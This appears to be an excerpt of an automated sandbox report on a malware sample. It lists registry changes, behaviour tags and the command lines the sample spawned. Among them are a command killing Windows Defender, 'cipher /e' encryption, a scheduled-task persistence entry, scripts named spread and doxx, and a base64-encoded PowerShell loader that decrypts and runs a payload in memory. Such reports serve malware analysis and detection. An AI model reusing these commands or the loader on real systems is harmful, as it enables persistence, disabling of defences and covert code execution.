101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url:favicon | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K spread.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K doxx.cmd
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy 1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\ipconfig.exe
ipconfig
C:\Windows\SysWOW64\xcopy.exe
xcopy 2 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\net.exe
net accounts
C:\Windows\SysWOW64\xcopy.exe
xcopy 3 C:\Users\Admin\
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts
C:\Windows\SysWOW64\net.exe
net user
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user
C:\Windows\SysWOW64\tasklist.exe
tasklist /apps /v /fo table
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WindowsDefender.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K handler.cmd
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K cipher.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe
Rover.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe
Google.exe
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs"
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:275457 /prefetch:2
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\PING.EXE
ping mrbeast.codes -t -n 1 -s 4 -4
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\xcopy.exe
xcopy Google.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy Rover.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy spinner.gif C:\Users\Admin\Desktop
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K bloatware.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe
regmess.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe
3.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K SilentSetup.cmd
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat" "
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$102F6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
C:\Windows\SysWOW64\reg.exe
reg import Setup.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Console.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Desktop.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import International.reg /reg:32
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\reg.exe
reg import Fonts.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Cursors.reg /reg:32
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweaker.exe /f
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0xMS0wOFQwOToxOToxOC41NTVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:406532 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe
scary.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe
the.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll
wimloader.dll
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
